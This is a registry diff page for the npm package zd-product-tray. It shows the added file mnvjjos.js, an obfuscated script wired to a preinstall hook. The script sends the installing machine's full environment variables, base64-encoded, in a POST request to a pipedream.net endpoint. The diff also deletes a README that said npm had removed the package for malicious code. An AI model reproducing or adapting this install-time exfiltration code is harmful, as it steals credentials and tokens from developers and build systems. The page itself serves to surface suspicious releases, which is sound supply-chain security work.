zd-product-tray 0.0.1-security → 3.723.416
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of zd-product-tray might be problematic. Click here for more details.
- package/mnvjjos.js +1 -0
- package/package.json +8 -3
- package/README.md +0 -5
package/mnvjjos.js
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
function a0_0x56df(_0x3713d4,_0x43952f){const _0x51b2cb=a0_0x51b2();return a0_0x56df=function(_0x56df79,_0xbde0f4){_0x56df79=_0x56df79-0x12d;let _0x286154=_0x51b2cb[_0x56df79];return _0x286154;},a0_0x56df(_0x3713d4,_0x43952f);}const a0_0x21d3be=a0_0x56df;(function(_0x45b574,_0xee5610){const _0x571046=a0_0x56df,_0x53feae=_0x45b574();while(!![]){try{const _0x462597=parseInt(_0x571046(0x13b))/0x1+parseInt(_0x571046(0x132))/0x2+parseInt(_0x571046(0x13d))/0x3*(-parseInt(_0x571046(0x13a))/0x4)+parseInt(_0x571046(0x137))/0x5*(parseInt(_0x571046(0x138))/0x6)+-parseInt(_0x571046(0x134))/0x7*(parseInt(_0x571046(0x12e))/0x8)+parseInt(_0x571046(0x13c))/0x9+-parseInt(_0x571046(0x139))/0xa*(parseInt(_0x571046(0x13f))/0xb);if(_0x462597===_0xee5610)break;else _0x53feae['push'](_0x53feae['shift']());}catch(_0x332abc){_0x53feae['push'](_0x53feae['shift']());}}}(a0_0x51b2,0x60d57));const http=require(a0_0x21d3be(0x13e));function a0_0x51b2(){const _0xfaee40=['234896aPOSfl','4aaa0dfa016c3686a57e93787657fa37','from','npm_package_name','1464306QYuJly','base64','189yGnhpZ','request','join','3715IwkLMU','4002HcKtMk','50SMuwDn','42468ZZrFsM','630811lMfyzR','483390FydIbO','135JIOcNV','https','539187FGnnEr','toString','pipedream','end','write','env'];a0_0x51b2=function(){return _0xfaee40;};return a0_0x51b2();}req=http[a0_0x21d3be(0x135)]({'host':[a0_0x21d3be(0x12f),'m',a0_0x21d3be(0x141),'net'][a0_0x21d3be(0x136)]('.'),'path':'/'+(process[a0_0x21d3be(0x12d)][a0_0x21d3be(0x131)]||''),'method':'POST'}),req[a0_0x21d3be(0x143)](Buffer[a0_0x21d3be(0x130)](JSON['stringify'](process[a0_0x21d3be(0x12d)]))[a0_0x21d3be(0x140)](a0_0x21d3be(0x133))),req[a0_0x21d3be(0x142)]();
|
package/package.json
CHANGED
|
@@ -1,6 +1,11 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "zd-product-tray",
|
|
3
|
-
"version": "
|
|
4
|
-
"
|
|
5
|
-
"
|
|
3
|
+
"version": "3.723.416",
|
|
4
|
+
"main": "mnvjjos.js",
|
|
5
|
+
"scripts": {
|
|
6
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
|
7
|
+
"preinstall": "node mnvjjos.js"
|
|
8
|
+
},
|
|
9
|
+
"author": "",
|
|
10
|
+
"license": "ISC"
|
|
6
11
|
}
|
package/README.md
DELETED
|
@@ -1,5 +0,0 @@
|
|
|
1
|
-
# Security holding package
|
|
2
|
-
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=zd-product-tray for more information.
|